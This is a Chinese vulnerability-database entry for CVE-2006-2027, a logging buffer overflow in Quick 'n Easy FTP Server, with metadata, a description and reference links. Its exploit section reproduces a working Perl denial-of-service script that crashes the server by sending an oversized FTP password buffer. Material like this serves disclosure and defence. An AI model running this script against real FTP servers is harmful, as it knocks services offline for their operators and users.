Pablo Software Solutions Quick 'n Easy FTP Server 记录缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108268 漏洞类型 缓冲区溢出
发布时间 2004-10-24 更新时间 2006-04-27
CVE编号 CVE-2006-2027 CNNVD-ID CNNVD-200604-467
漏洞平台 Windows CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/593
https://cxsecurity.com/issue/WLB-2006040109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-467
|漏洞详情
BPabloSoftwareSolutionsQuick'nEasyFTPServer专业版和精简版,大概是3.0版本,其日志功能的Unicode字符处理存在缓冲区溢出。这使得远程认证用户可以通过发送具有长参数的命令执行任意代码;当管理员在FTP服务器主窗口中选择"日志"选项时,上述命令触发缓冲区溢出注:最初的调查者称,厂商对此问题持有争议。
|漏洞EXP
#!/usr/local/bin/perl -w

###########################################################
###########################################################
##   Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes	
## will crash the sever,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
############################################################
############################################################


use Net::FTP;


$hostname = 'localhost'; 		#Remote Host to D.o.S!
$username = 'anonymous'; 		#AnythinG HeRe!

print "\n[*]BuiLDinG BuFfer...\n";

$password = 'A'x1041   ; 		#OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";

$ftp = Net::FTP->new($hostname);        # Connecting...
print "[*]SenDing DeViL...\n\n";

$ftp->login($username, $password);      # Send EviL BuffeR...

$ftp->quit;
print "SerVer Has Been Dosed,will be Down if  LogFile is or will be viewed!\n";


# milw0rm.com [2004-10-24]
|参考资料

来源:BUGTRAQ
名称:20060424Quick'nEasyFTPServerpro/liteLoggingunicodestackoverflow
链接:http://www.securityfocus.com/archive/1/archive/1/431920/100/0/threaded
来源:BID
名称:17681
链接:http://www.securityfocus.com/bid/17681
来源:OSVDB
名称:25235
链接:http://www.osvdb.org/25235
来源:SREASON
名称:788
链接:http://securityreason.com/securityalert/788